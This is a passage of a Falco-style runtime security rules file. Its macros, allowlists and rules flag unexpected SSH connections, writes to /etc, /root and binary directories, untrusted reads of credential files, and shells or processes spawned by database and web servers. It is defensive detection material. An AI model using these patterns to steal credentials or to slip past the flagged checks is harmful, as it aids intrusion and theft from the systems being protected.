fd.sip="e.f.g.h" or ..." 267 | - macro: allowed_ssh_hosts 268 | condition: ssh_port 269 | 270 | - rule: Disallowed SSH Connection 271 | desc: Detect any new ssh connection to a host other than those in an allowed group of hosts 272 | condition: (outbound or inbound) and ssh_port and not allowed_ssh_hosts 273 | output: Disallowed SSH Connection (command=%proc.cmdline connection=%fd.name user=%user.name) 274 | priority: NOTICE 275 | tags: [network] 276 | 277 | # Use this to test whether the event occurred within a container. 278 | 279 | # When displaying container information in the output field, use 280 | # %container.info, without any leading term (file=%fd.name 281 | # %container.info user=%user.name, and not file=%fd.name 282 | # container=%container.info user=%user.name). The output will change 283 | # based on the context and whether or not -pk/-pm/-pc was specified on 284 | # the command line. 285 | - macro: container 286 | condition: container.id != host 287 | 288 | - macro: interactive 289 | condition: > 290 | ((proc.aname=sshd and proc.name != sshd) or 291 | proc.name=systemd-logind or proc.name=login) 292 | 293 | - list: cron_binaries 294 | items: [anacron, cron, crond, crontab] 295 | 296 | # https://github.com/liske/needrestart 297 | - list: needrestart_binaries 298 | items: [needrestart, 10-dpkg, 20-rpm, 30-pacman] 299 | 300 | # Possible scripts run by sshkit 301 | - list: sshkit_script_binaries 302 | items: [10_etc_sudoers., 10_passwd_group] 303 | 304 | - list: plesk_binaries 305 | items: [sw-engine, sw-engine-fpm, sw-engine-kv, filemng, f2bmng] 306 | 307 | # System users that should never log into a system. Consider adding your own 308 | # service users (e.g. 'apache' or 'mysqld') here. 309 | - macro: system_users 310 | condition: user.name in (bin, daemon, games, lp, mail, nobody, sshd, sync, uucp, www-data) 311 | 312 | # These macros will be removed soon. Only keeping them to maintain 313 | # compatiblity with some widely used rules files. 314 | # Begin Deprecated 315 | - macro: parent_ansible_running_python 316 | condition: (proc.pname in (python, pypy) and proc.pcmdline contains ansible) 317 | 318 | - macro: parent_bro_running_python 319 | condition: (proc.pname=python and proc.cmdline contains /usr/share/broctl) 320 | 321 | - macro: parent_python_running_denyhosts 322 | condition: > 323 | (proc.cmdline startswith "denyhosts.py /usr/bin/denyhosts.py" or 324 | (proc.pname=python and 325 | (proc.pcmdline contains /usr/sbin/denyhosts or 326 | proc.pcmdline contains /usr/local/bin/denyhosts.py))) 327 | 328 | - macro: parent_python_running_sdchecks 329 | condition: > 330 | (proc.pname in (python, python2.7) and 331 | (proc.pcmdline contains /opt/draios/bin/sdchecks)) 332 | 333 | - macro: parent_linux_image_upgrade_script 334 | condition: proc.pname startswith linux-image- 335 | 336 | - macro: parent_java_running_echo 337 | condition: (proc.pname=java and proc.cmdline startswith "sh -c echo") 338 | 339 | - macro: parent_scripting_running_builds 340 | condition: > 341 | (proc.pname in (php,php5-fpm,php-fpm7.1,python,ruby,ruby2.3,ruby2.1,node,conda) and ( 342 | proc.cmdline startswith "sh -c git" or 343 | proc.cmdline startswith "sh -c date" or 344 | proc.cmdline startswith "sh -c /usr/bin/g++" or 345 | proc.cmdline startswith "sh -c /usr/bin/gcc" or 346 | proc.cmdline startswith "sh -c gcc" or 347 | proc.cmdline startswith "sh -c if type gcc" or 348 | proc.cmdline startswith "sh -c cd '/var/www/edi/';LC_ALL=en_US.UTF-8 git" or 349 | proc.cmdline startswith "sh -c /var/www/edi/bin/sftp.sh" or 350 | proc.cmdline startswith "sh -c /usr/src/app/crxlsx/bin/linux/crxlsx" or 351 | proc.cmdline startswith "sh -c make parent" or 352 | proc.cmdline startswith "node /jenkins/tools" or 353 | proc.cmdline startswith "sh -c '/usr/bin/node'" or 354 | proc.cmdline startswith "sh -c stty -a |" or 355 | proc.pcmdline startswith "node /opt/nodejs/bin/yarn" or 356 | proc.pcmdline startswith "node /usr/local/bin/yarn" or 357 | proc.pcmdline startswith "node /root/.config/yarn" or 358 | proc.pcmdline startswith "node /opt/yarn/bin/yarn.js")) 359 | 360 | - macro: parent_Xvfb_running_xkbcomp 361 | condition: (proc.pname=Xvfb and proc.cmdline startswith 'sh -c "/usr/bin/xkbcomp"') 362 | 363 | - macro: parent_nginx_running_serf 364 | condition: (proc.pname=nginx and proc.cmdline startswith "sh -c serf") 365 | 366 | - macro: parent_node_running_npm 367 | condition: (proc.pcmdline startswith "node /usr/local/bin/npm" or 368 | proc.pcmdline startswith "node /usr/local/nodejs/bin/npm" or 369 | proc.pcmdline startswith "node /opt/rh/rh-nodejs6/root/usr/bin/npm") 370 | 371 | - macro: parent_java_running_sbt 372 | condition: (proc.pname=java and proc.pcmdline contains sbt-launch.jar) 373 | 374 | - list: known_container_shell_spawn_cmdlines 375 | items: [] 376 | 377 | - list: known_shell_spawn_binaries 378 | items: [] 379 | 380 | - macro: shell_spawning_containers 381 | condition: (container.image startswith jenkins or 382 | container.image startswith gitlab/gitlab-ce or 383 | container.image startswith gitlab/gitlab-ee) 384 | 385 | ## End Deprecated 386 | 387 | - macro: ansible_running_python 388 | condition: (proc.name in (python, pypy) and proc.cmdline contains ansible) 389 | 390 | - macro: chef_running_yum_dump 391 | condition: (proc.name=python and proc.cmdline contains yum-dump.py) 392 | 393 | - macro: python_running_denyhosts 394 | condition: > 395 | (proc.name=python and 396 | (proc.cmdline contains /usr/sbin/denyhosts or 397 | proc.cmdline contains /usr/local/bin/denyhosts.py)) 398 | 399 | # Qualys seems to run a variety of shell subprocesses, at various 400 | # levels. This checks at a few levels without the cost of a full 401 | # proc.aname, which traverses the full parent heirarchy. 402 | - macro: run_by_qualys 403 | condition: > 404 | (proc.pname=qualys-cloud-ag or 405 | proc.aname[2]=qualys-cloud-ag or 406 | proc.aname[3]=qualys-cloud-ag or 407 | proc.aname[4]=qualys-cloud-ag) 408 | 409 | - macro: run_by_sumologic_securefiles 410 | condition: > 411 | ((proc.cmdline="usermod -a -G sumologic_collector" or 412 | proc.cmdline="groupadd sumologic_collector") and 413 | (proc.pname=secureFiles.sh and proc.aname[2]=java)) 414 | 415 | - macro: run_by_yum 416 | condition: ((proc.pname=sh and proc.aname[2]=yum) or 417 | (proc.aname[2]=sh and proc.aname[3]=yum)) 418 | 419 | - macro: run_by_ms_oms 420 | condition: > 421 | (proc.aname[3] startswith omsagent- or 422 | proc.aname[3] startswith scx-) 423 | 424 | - macro: run_by_google_accounts_daemon 425 | condition: > 426 | (proc.aname[1] startswith google_accounts or 427 | proc.aname[2] startswith google_accounts) 428 | 429 | # Chef is similar. 430 | - macro: run_by_chef 431 | condition: (proc.aname[2]=chef_command_wr or proc.aname[3]=chef_command_wr or 432 | proc.aname[2]=chef-client or proc.aname[3]=chef-client or 433 | proc.name=chef-client) 434 | 435 | - macro: run_by_adclient 436 | condition: (proc.aname[2]=adclient or proc.aname[3]=adclient or proc.aname[4]=adclient) 437 | 438 | - macro: run_by_centrify 439 | condition: (proc.aname[2]=centrify or proc.aname[3]=centrify or proc.aname[4]=centrify) 440 | 441 | - macro: run_by_puppet 442 | condition: (proc.aname[2]=puppet or proc.aname[3]=puppet) 443 | 444 | # Also handles running semi-indirectly via scl 445 | - macro: run_by_foreman 446 | condition: > 447 | (user.name=foreman and 448 | (proc.pname in (rake, ruby, scl) and proc.aname[5] in (tfm-rake,tfm-ruby)) or 449 | (proc.pname=scl and proc.aname[2] in (tfm-rake,tfm-ruby))) 450 | 451 | - macro: java_running_sdjagent 452 | condition: proc.name=java and proc.cmdline contains sdjagent.jar 453 | 454 | - macro: kubelet_running_loopback 455 | condition: (proc.pname=kubelet and proc.name=loopback) 456 | 457 | - macro: python_mesos_marathon_scripting 458 | condition: (proc.pcmdline startswith "python3 /marathon-lb/marathon_lb.py") 459 | 460 | - macro: splunk_running_forwarder 461 | condition: (proc.pname=splunkd and proc.cmdline startswith "sh -c /opt/splunkforwarder") 462 | 463 | - macro: parent_supervise_running_multilog 464 | condition: (proc.name=multilog and proc.pname=supervise) 465 | 466 | - macro: supervise_writing_status 467 | condition: (proc.name in (supervise,svc) and fd.name startswith "/etc/sb/") 468 | 469 | - macro: pki_realm_writing_realms 470 | condition: (proc.cmdline startswith "bash /usr/local/lib/pki/pki-realm" and fd.name startswith /etc/pki/realms) 471 | 472 | - macro: htpasswd_writing_passwd 473 | condition: (proc.name=htpasswd and fd.name=/etc/nginx/.htpasswd) 474 | 475 | - macro: lvprogs_writing_lvm_archive 476 | condition: (proc.name in (dmeventd,lvcreate) and (fd.name startswith /etc/lvm/archive or 477 | fd.name startswith /etc/lvm/backup)) 478 | - macro: ovsdb_writing_openvswitch 479 | condition: (proc.name=ovsdb-server and fd.directory=/etc/openvswitch) 480 | 481 | - macro: perl_running_plesk 482 | condition: (proc.cmdline startswith "perl /opt/psa/admin/bin/plesk_agent_manager" or 483 | proc.pcmdline startswith "perl /opt/psa/admin/bin/plesk_agent_manager") 484 | 485 | - macro: perl_running_updmap 486 | condition: (proc.cmdline startswith "perl /usr/bin/updmap") 487 | 488 | - macro: perl_running_centrifydc 489 | condition: (proc.cmdline startswith "perl /usr/share/centrifydc") 490 | 491 | - macro: parent_ucf_writing_conf 492 | condition: (proc.pname=ucf and proc.aname[2]=frontend) 493 | 494 | - macro: consul_template_writing_conf 495 | condition: > 496 | ((proc.name=consul-template and fd.name startswith /etc/haproxy) or 497 | (proc.name=reload.sh and proc.aname[2]=consul-template and fd.name startswith /etc/ssl)) 498 | 499 | - macro: countly_writing_nginx_conf 500 | condition: (proc.cmdline startswith "nodejs /opt/countly/bin" and fd.name startswith /etc/nginx) 501 | 502 | - macro: ms_oms_writing_conf 503 | condition: > 504 | ((proc.name in (omiagent,omsagent,in_heartbeat_r*,omsadmin.sh,PerformInventor) 505 | or proc.pname in (omi.postinst,omsconfig.posti,scx.postinst,omsadmin.sh,omiagent)) 506 | and (fd.name startswith /etc/opt/omi or fd.name startswith /etc/opt/microsoft/omsagent)) 507 | 508 | - macro: ms_scx_writing_conf 509 | condition: (proc.name in (GetLinuxOS.sh) and fd.name startswith /etc/opt/microsoft/scx) 510 | 511 | - macro: azure_scripts_writing_conf 512 | condition: (proc.pname startswith "bash /var/lib/waagent/" and fd.name startswith /etc/azure) 513 | 514 | - macro: azure_networkwatcher_writing_conf 515 | condition: (proc.name in (NetworkWatcherA) and fd.name=/etc/init.d/AzureNetworkWatcherAgent) 516 | 517 | - macro: couchdb_writing_conf 518 | condition: (proc.name=beam.smp and proc.cmdline contains couchdb and fd.name startswith /etc/couchdb) 519 | 520 | - macro: update_texmf_writing_conf 521 | condition: (proc.name=update-texmf and fd.name startswith /etc/texmf) 522 | 523 | - macro: slapadd_writing_conf 524 | condition: (proc.name=slapadd and fd.name startswith /etc/ldap) 525 | 526 | - macro: symantec_writing_conf 527 | condition: > 528 | ((proc.name=symcfgd and fd.name startswith /etc/symantec) or 529 | (proc.name=navdefutil and fd.name=/etc/symc-defutils.conf)) 530 | 531 | - macro: liveupdate_writing_conf 532 | condition: (proc.cmdline startswith "java LiveUpdate" and fd.name in (/etc/liveupdate.conf, /etc/Product.Catalog.JavaLiveUpdate)) 533 | 534 | - macro: sosreport_writing_files 535 | condition: > 536 | (proc.name=urlgrabber-ext- and proc.aname[3]=sosreport and 537 | (fd.name startswith /etc/pkt/nssdb or fd.name startswith /etc/pki/nssdb)) 538 | 539 | - macro: selinux_writing_conf 540 | condition: (proc.name in (semodule,genhomedircon,sefcontext_comp) and fd.name startswith /etc/selinux) 541 | 542 | - list: veritas_binaries 543 | items: [vxconfigd, sfcache, vxclustadm, vxdctl, vxprint, vxdmpadm, vxdisk, vxdg, vxassist, vxtune] 544 | 545 | - macro: veritas_driver_script 546 | condition: (proc.cmdline startswith "perl /opt/VRTSsfmh/bin/mh_driver.pl") 547 | 548 | - macro: veritas_progs 549 | condition: (proc.name in (veritas_binaries) or veritas_driver_script) 550 | 551 | - macro: veritas_writing_config 552 | condition: (veritas_progs and fd.name startswith /etc/vx) 553 | 554 | - macro: nginx_writing_conf 555 | condition: (proc.name=nginx and fd.name startswith /etc/nginx) 556 | 557 | - macro: nginx_writing_certs 558 | condition: > 559 | (((proc.name=openssl and proc.pname=nginx-launch.sh) or proc.name=nginx-launch.sh) and fd.name startswith /etc/nginx/certs) 560 | 561 | - macro: chef_client_writing_conf 562 | condition: (proc.pcmdline startswith "chef-client /opt/gitlab" and fd.name startswith /etc/gitlab) 563 | 564 | - macro: centrify_writing_krb 565 | condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5) 566 | 567 | - macro: cockpit_writing_conf 568 | condition: > 569 | ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la) 570 | and fd.name startswith /etc/cockpit) 571 | 572 | - macro: ipsec_writing_conf 573 | condition: (proc.name=start-ipsec.sh and fd.directory=/etc/ipsec) 574 | 575 | - macro: exe_running_docker_save 576 | condition: (proc.cmdline startswith "exe /var/lib/docker" and proc.pname in (dockerd, docker)) 577 | 578 | - macro: python_running_get_pip 579 | condition: (proc.cmdline startswith "python get-pip.py") 580 | 581 | - macro: python_running_ms_oms 582 | condition: (proc.cmdline startswith "python /var/lib/waagent/") 583 | 584 | - macro: gugent_writing_guestagent_log 585 | condition: (proc.name=gugent and fd.name=GuestAgent.log) 586 | 587 | - rule: Write below binary dir 588 | desc: an attempt to write to any file below a set of binary directories 589 | condition: > 590 | bin_dir and evt.dir = < and open_write 591 | and not package_mgmt_procs 592 | and not exe_running_docker_save 593 | and not python_running_get_pip 594 | and not python_running_ms_oms 595 | output: > 596 | File below a known binary directory opened for writing (user=%user.name 597 | command=%proc.cmdline file=%fd.name parent=%proc.pname pcmdline=%proc.pcmdline gparent=%proc.aname[2]) 598 | priority: ERROR 599 | tags: [filesystem] 600 | 601 | - list: safe_etc_dirs 602 | items: [/etc/cassandra, /etc/ssl/certs/java, /etc/logstash, /etc/nginx/conf.d, /etc/container_environment, /etc/hrmconfig] 603 | 604 | - macro: fluentd_writing_conf_files 605 | condition: (proc.name=start-fluentd and fd.name in (/etc/fluent/fluent.conf, /etc/td-agent/td-agent.conf)) 606 | 607 | - macro: qualys_writing_conf_files 608 | condition: (proc.name=qualys-cloud-ag and fd.name=/etc/qualys/cloud-agent/qagent-log.conf) 609 | 610 | - macro: git_writing_nssdb 611 | condition: (proc.name=git-remote-http and fd.directory=/etc/pki/nssdb) 612 | 613 | - macro: plesk_writing_keys 614 | condition: (proc.name in (plesk_binaries) and fd.name startswith /etc/sw/keys) 615 | 616 | - macro: plesk_install_writing_apache_conf 617 | condition: (proc.cmdline startswith "bash -hB /usr/lib/plesk-9.0/services/webserver.apache configure" 618 | and fd.name="/etc/apache2/apache2.conf.tmp") 619 | 620 | - macro: plesk_running_mktemp 621 | condition: (proc.name=mktemp and proc.aname[3] in (plesk_binaries)) 622 | 623 | - macro: networkmanager_writing_resolv_conf 624 | condition: proc.aname[2]=nm-dispatcher and fd.name=/etc/resolv.conf 625 | 626 | - macro: add_shell_writing_shells_tmp 627 | condition: (proc.name=add-shell and fd.name=/etc/shells.tmp) 628 | 629 | - macro: duply_writing_exclude_files 630 | condition: (proc.name=touch and proc.pcmdline startswith "bash /usr/bin/duply" and fd.name startswith "/etc/duply") 631 | 632 | - macro: xmlcatalog_writing_files 633 | condition: (proc.name=update-xmlcatal and fd.directory=/etc/xml) 634 | 635 | - macro: datadog_writing_conf 636 | condition: ((proc.cmdline startswith "python /opt/datadog-agent" or 637 | proc.cmdline startswith "entrypoint.sh /entrypoint.sh datadog start" or 638 | proc.cmdline startswith "agent.py /opt/datadog-agent") 639 | and fd.name startswith "/etc/dd-agent") 640 | 641 | - macro: curl_writing_pki_db 642 | condition: (proc.name=curl and fd.directory=/etc/pki/nssdb) 643 | 644 | - macro: haproxy_writing_conf 645 | condition: ((proc.name in (update-haproxy-,haproxy_reload.) or proc.pname in (update-haproxy-,haproxy_reload,haproxy_reload.)) 646 | and (fd.name=/etc/openvpn/client.map or fd.name startswith /etc/haproxy)) 647 | 648 | - macro: java_writing_conf 649 | condition: (proc.name=java and fd.name=/etc/.java/.systemPrefs/.system.lock) 650 | 651 | - macro: rabbitmq_writing_conf 652 | condition: (proc.name=rabbitmq-server and fd.directory=/etc/rabbitmq) 653 | 654 | - macro: rook_writing_conf 655 | condition: (proc.name=toolbox.sh and container.image startswith rook/toolbox 656 | and fd.directory=/etc/ceph) 657 | 658 | - macro: httpd_writing_conf_logs 659 | condition: (proc.name=httpd and fd.name startswith /etc/httpd/) 660 | 661 | - macro: mysql_writing_conf 662 | condition: ((proc.name=start-mysql.sh or proc.pname=start-mysql.sh) and fd.name startswith /etc/mysql) 663 | 664 | - macro: openvpn_writing_conf 665 | condition: (proc.name in (openvpn,openvpn-entrypo) and fd.name startswith /etc/openvpn) 666 | 667 | - macro: php_handlers_writing_conf 668 | condition: (proc.name=php_handlers_co and fd.name=/etc/psa/php_versions.json) 669 | 670 | - macro: sed_writing_temp_file 671 | condition: > 672 | ((proc.aname[3]=cron_start.sh and fd.name startswith /etc/security/sed) or 673 | (proc.name=sed and (fd.name startswith /etc/apt/sources.list.d/sed or 674 | fd.name startswith /etc/apt/sed or 675 | fd.name startswith /etc/apt/apt.conf.d/sed))) 676 | 677 | - macro: cron_start_writing_pam_env 678 | condition: (proc.cmdline="bash /usr/sbin/start-cron" and fd.name=/etc/security/pam_env.conf) 679 | 680 | # In some cases dpkg-reconfigur runs commands that modify /etc. Not 681 | # putting the full set of package management programs yet. 682 | - macro: dpkg_scripting 683 | condition: (proc.aname[2] in (dpkg-reconfigur, dpkg-preconfigu)) 684 | 685 | # Add conditions to this macro (probably in a separate file, 686 | # overwriting this macro) to allow for specific combinations of 687 | # programs writing below specific directories below 688 | # /etc. fluentd_writing_conf_files is a good example to follow, as it 689 | # specifies both the program doing the writing as well as the specific 690 | # files it is allowed to modify. 691 | # 692 | # In this file, it just takes one of the programs in the base macro 693 | # and repeats it. 694 | 695 | - macro: user_known_write_etc_conditions 696 | condition: proc.name=confd 697 | 698 | - macro: write_etc_common 699 | condition: > 700 | etc_dir and evt.dir = < and open_write 701 | and proc_name_exists 702 | and not proc.name in (passwd_binaries, shadowutils_binaries, sysdigcloud_binaries, 703 | package_mgmt_binaries, ssl_mgmt_binaries, dhcp_binaries, 704 | dev_creation_binaries, shell_mgmt_binaries, 705 | mail_config_binaries, 706 | sshkit_script_binaries, 707 | ldconfig.real, ldconfig, confd, gpg, insserv, 708 | apparmor_parser, update-mime, tzdata.config, tzdata.postinst, 709 | systemd, systemd-machine, systemd-sysuser, 710 | debconf-show, rollerd, bind9.postinst, sv, 711 | gen_resolvconf., update-ca-certi, certbot, runsv, 712 | qualys-cloud-ag, locales.postins, nomachine_binaries, 713 | adclient, certutil, crlutil, pam-auth-update, parallels_insta, 714 | openshift-launc, update-rc.d) 715 | and not proc.pname in (sysdigcloud_binaries, mail_config_binaries, hddtemp.postins, sshkit_script_binaries, locales.postins, deb_binaries, dhcp_binaries) 716 | and not fd.name pmatch (safe_etc_dirs) 717 | and not fd.name in (/etc/container_environment.sh, /etc/container_environment.json, /etc/motd, /etc/motd.svc) 718 | and not exe_running_docker_save 719 | and not ansible_running_python 720 | and not python_running_denyhosts 721 | and not fluentd_writing_conf_files 722 | and not user_known_write_etc_conditions 723 | and not run_by_centrify 724 | and not run_by_adclient 725 | and not qualys_writing_conf_files 726 | and not git_writing_nssdb 727 | and not plesk_writing_keys 728 | and not plesk_install_writing_apache_conf 729 | and not plesk_running_mktemp 730 | and not networkmanager_writing_resolv_conf 731 | and not run_by_chef 732 | and not add_shell_writing_shells_tmp 733 | and not duply_writing_exclude_files 734 | and not xmlcatalog_writing_files 735 | and not parent_supervise_running_multilog 736 | and not supervise_writing_status 737 | and not pki_realm_writing_realms 738 | and not htpasswd_writing_passwd 739 | and not lvprogs_writing_lvm_archive 740 | and not ovsdb_writing_openvswitch 741 | and not datadog_writing_conf 742 | and not curl_writing_pki_db 743 | and not haproxy_writing_conf 744 | and not java_writing_conf 745 | and not dpkg_scripting 746 | and not parent_ucf_writing_conf 747 | and not rabbitmq_writing_conf 748 | and not rook_writing_conf 749 | and not php_handlers_writing_conf 750 | and not sed_writing_temp_file 751 | and not cron_start_writing_pam_env 752 | and not httpd_writing_conf_logs 753 | and not mysql_writing_conf 754 | and not openvpn_writing_conf 755 | and not consul_template_writing_conf 756 | and not countly_writing_nginx_conf 757 | and not ms_oms_writing_conf 758 | and not ms_scx_writing_conf 759 | and not azure_scripts_writing_conf 760 | and not azure_networkwatcher_writing_conf 761 | and not couchdb_writing_conf 762 | and not update_texmf_writing_conf 763 | and not slapadd_writing_conf 764 | and not symantec_writing_conf 765 | and not liveupdate_writing_conf 766 | and not sosreport_writing_files 767 | and not selinux_writing_conf 768 | and not veritas_writing_config 769 | and not nginx_writing_conf 770 | and not nginx_writing_certs 771 | and not chef_client_writing_conf 772 | and not centrify_writing_krb 773 | and not cockpit_writing_conf 774 | and not ipsec_writing_conf 775 | 776 | - rule: Write below etc 777 | desc: an attempt to write to any file below /etc 778 | condition: write_etc_common 779 | output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname pcmdline=%proc.pcmdline file=%fd.name program=%proc.name gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4])" 780 | priority: ERROR 781 | tags: [filesystem] 782 | 783 | - list: known_root_files 784 | items: [/root/.monit.state, /root/.auth_tokens, /root/.bash_history, /root/.ash_history, /root/.aws/credentials, 785 | /root/.viminfo.tmp, /root/.lesshst, /root/.bzr.log, /root/.gitconfig.lock, /root/.babel.json, /root/.localstack, 786 | /root/.node_repl_history, /root/.mongorc.js, /root/.dbshell, /root/.augeas/history, /root/.rnd] 787 | 788 | - list: known_root_directories 789 | items: [/root/.oracle_jre_usage, /root/.ssh, /root/.subversion, /root/.nami] 790 | 791 | - macro: known_root_conditions 792 | condition: (fd.name startswith /root/orcexec. 793 | or fd.name startswith /root/.m2 794 | or fd.name startswith /root/.npm 795 | or fd.name startswith /root/.pki 796 | or fd.name startswith /root/.ivy2 797 | or fd.name startswith /root/.config/Cypress 798 | or fd.name startswith /root/.config/pulse 799 | or fd.name startswith /root/.config/configstore 800 | or fd.name startswith /root/jenkins/workspace 801 | or fd.name startswith /root/.jenkins 802 | or fd.name startswith /root/.cache 803 | or fd.name startswith /root/.sbt 804 | or fd.name startswith /root/.java 805 | or fd.name startswith /root/.glide 806 | or fd.name startswith /root/.sonar 807 | or fd.name startswith /root/.v8flag 808 | or fd.name startswith /root/infaagent 809 | or fd.name startswith /root/.local/lib/python 810 | or fd.name startswith /root/.pm2 811 | or fd.name startswith /root/.gnupg 812 | or fd.name startswith /root/.pgpass 813 | or fd.name startswith /root/.theano 814 | or fd.name startswith /root/.gradle 815 | or fd.name startswith /root/.android 816 | or fd.name startswith /root/.ansible 817 | or fd.name startswith /root/.crashlytics 818 | or fd.name startswith /root/.dbus 819 | or fd.name startswith /root/.composer 820 | or fd.name startswith /root/.gconf 821 | or fd.name startswith /root/.nv) 822 | 823 | - rule: Write below root 824 | desc: an attempt to write to any file directly below / or /root 825 | condition: > 826 | root_dir and evt.dir = < and open_write 827 | and not fd.name in (known_root_files) 828 | and not fd.directory in (known_root_directories) 829 | and not exe_running_docker_save 830 | and not gugent_writing_guestagent_log 831 | and not known_root_conditions 832 | output: "File below / or /root opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname file=%fd.name program=%proc.name)" 833 | priority: ERROR 834 | tags: [filesystem] 835 | 836 | - macro: cmp_cp_by_passwd 837 | condition: proc.name in (cmp, cp) and proc.pname in (passwd, run-parts) 838 | 839 | - rule: Read sensitive file trusted after startup 840 | desc: > 841 | an attempt to read any sensitive file (e.g. files containing user/password/authentication 842 | information) by a trusted program after startup. Trusted programs might read these files 843 | at startup to load initial state, but not afterwards. 844 | condition: sensitive_files and open_read and server_procs and not proc_is_new and proc.name!="sshd" 845 | output: > 846 | Sensitive file opened for reading by trusted program after startup (user=%user.name 847 | command=%proc.cmdline parent=%proc.pname file=%fd.name parent=%proc.pname gparent=%proc.aname[2]) 848 | priority: WARNING 849 | tags: [filesystem] 850 | 851 | - list: read_sensitive_file_binaries 852 | items: [ 853 | iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, sshd, 854 | vsftpd, systemd, mysql_install_d, psql, screen, debconf-show, sa-update, 855 | pam-auth-update, /usr/sbin/spamd, polkit-agent-he, lsattr, file, sosreport, 856 | scxcimservera, adclient, rtvscand, cockpit-session 857 | ] 858 | 859 | # Add conditions to this macro (probably in a separate file, 860 | # overwriting this macro) to allow for specific combinations of 861 | # programs accessing sensitive files. 862 | # fluentd_writing_conf_files is a good example to follow, as it 863 | # specifies both the program doing the writing as well as the specific 864 | # files it is allowed to modify. 865 | # 866 | # In this file, it just takes one of the macros in the base rule 867 | # and repeats it. 868 | 869 | - macro: user_read_sensitive_file_conditions 870 | condition: cmp_cp_by_passwd 871 | 872 | - rule: Read sensitive file untrusted 873 | desc: > 874 | an attempt to read any sensitive file (e.g. files containing user/password/authentication 875 | information). Exceptions are made for known trusted programs. 876 | condition: > 877 | sensitive_files and open_read 878 | and proc_name_exists 879 | and not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries, 880 | cron_binaries, read_sensitive_file_binaries, shell_binaries, hids_binaries, 881 | vpn_binaries, mail_config_binaries, nomachine_binaries, sshkit_script_binaries, 882 | in.proftpd, mandb, salt-minion, postgres_mgmt_binaries) 883 | and not cmp_cp_by_passwd 884 | and not ansible_running_python 885 | and not proc.cmdline contains /usr/bin/mandb 886 | and not run_by_qualys 887 | and not run_by_chef 888 | and not user_read_sensitive_file_conditions 889 | and not perl_running_plesk 890 | and not perl_running_updmap 891 | and not veritas_driver_script 892 | and not perl_running_centrifydc 893 | output: > 894 | Sensitive file opened for reading by non-trusted program (user=%user.name program=%proc.name 895 | command=%proc.cmdline file=%fd.name parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4]) 896 | priority: WARNING 897 | tags: [filesystem] 898 | 899 | # Only let rpm-related programs write to the rpm database 900 | - rule: Write below rpm database 901 | desc: an attempt to write to the rpm database by any non-rpm related program 902 | condition: fd.name startswith /var/lib/rpm and open_write and not rpm_procs and not ansible_running_python and not chef_running_yum_dump 903 | output: "Rpm database opened for writing by a non-rpm program (command=%proc.cmdline file=%fd.name)" 904 | priority: ERROR 905 | tags: [filesystem, software_mgmt] 906 | 907 | - macro: postgres_running_wal_e 908 | condition: (proc.pname=postgres and proc.cmdline startswith "sh -c envdir /etc/wal-e.d/env /usr/local/bin/wal-e") 909 | 910 | - macro: redis_running_prepost_scripts 911 | condition: (proc.aname[2]=redis-server and (proc.cmdline contains "redis-server.post-up.d" or proc.cmdline contains "redis-server.pre-up.d")) 912 | 913 | - macro: rabbitmq_running_scripts 914 | condition: (proc.pname=beam.smp and (proc.cmdline startswith "sh -c exec ps" or proc.cmdline startswith "sh -c exec inet_gethost")) 915 | 916 | - macro: rabbitmqctl_running_scripts 917 | condition: (proc.aname[2]=rabbitmqctl and proc.cmdline startswith "sh -c ") 918 | 919 | - rule: DB program spawned process 920 | desc: > 921 | a database-server related program spawned a new process other than itself. 922 | This shouldn\'t occur and is a follow on from some SQL injection attacks. 923 | condition: > 924 | proc.pname in (db_server_binaries) 925 | and spawned_process 926 | and not proc.name in (db_server_binaries) 927 | and not postgres_running_wal_e 928 | output: > 929 | Database-related program spawned process other than itself (user=%user.name 930 | program=%proc.cmdline parent=%proc.pname) 931 | priority: NOTICE 932 | tags: [process, database] 933 | 934 | - rule: Modify binary dirs 935 | desc: an attempt to modify any file below a set of binary directories. 936 | condition: (bin_dir_rename or bin_dir_resolved) and modify and not package_mgmt_procs and not exe_running_docker_save 937 | output: > 938 | File below known binary directory renamed/removed (user=%user.name command=%proc.cmdline 939 | operation=%evt.type file=%fd.name %evt.args) 940 | priority: ERROR 941 | tags: [filesystem] 942 | 943 | - rule: Mkdir binary dirs 944 | desc: an attempt to create a directory below a set of binary directories. 945 | condition: mkdir and bin_dir_mkdir and not package_mgmt_procs 946 | output: > 947 | Directory below known binary directory created (user=%user.name 948 | command=%proc.cmdline directory=%evt.arg.path) 949 | priority: ERROR 950 | tags: [filesystem] 951 | 952 | # This list allows for easy additions to the set of commands allowed 953 | # to change thread namespace without having to copy and override the 954 | # entire change thread namespace rule. 955 | - list: user_known_change_thread_namespace_binaries 956 | items: [] 957 | 958 | - rule: Change thread namespace 959 | desc: > 960 | an attempt to change a program/thread\'s namespace (commonly done 961 | as a part of creating a container) by calling setns. 962 | condition: > 963 | evt.type = setns 964 | and not proc.name in (docker_binaries, k8s_binaries, lxd_binaries, sysdigcloud_binaries, sysdig, nsenter) 965 | and not proc.name in (user_known_change_thread_namespace_binaries) 966 | and not proc.name startswith "runc:" 967 | and not proc.pname in (sysdigcloud_binaries) 968 | and not java_running_sdjagent 969 | and not kubelet_running_loopback 970 | output: > 971 | Namespace change (setns) by unexpected program (user=%user.name command=%proc.cmdline 972 | parent=%proc.pname %container.info) 973 | priority: NOTICE 974 | tags: [process] 975 | 976 | # The binaries in this list and their descendents are *not* allowed 977 | # spawn shells. This includes the binaries spawning shells directly as 978 | # well as indirectly. For example, apache -> php/perl for 979 | # mod_{php,perl} -> some shell is also not allowed, because the shell 980 | # has apache as an ancestor. 981 | 982 | - list: protected_shell_spawning_binaries 983 | items: [ 984 | http_server_binaries, db_server_binaries, nosql_server_binaries, mail_binaries, 985 | fluentd, flanneld, splunkd, consul, smbd, runsv, PM2 986 | ] 987 | 988 | - macro: parent_java_running_zookeeper 989 | condition: (proc.pname=java and proc.pcmdline contains org.apache.zookeeper.server) 990 | 991 | - macro: parent_java_running_kafka 992 | condition: (proc.pname=java and proc.pcmdline contains kafka.Kafka) 993 | 994 | - macro: parent_java_running_elasticsearch 995 | condition: (proc.pname=java and proc.pcmdline contains org.elasticsearch.bootstrap.Elasticsearch) 996 | 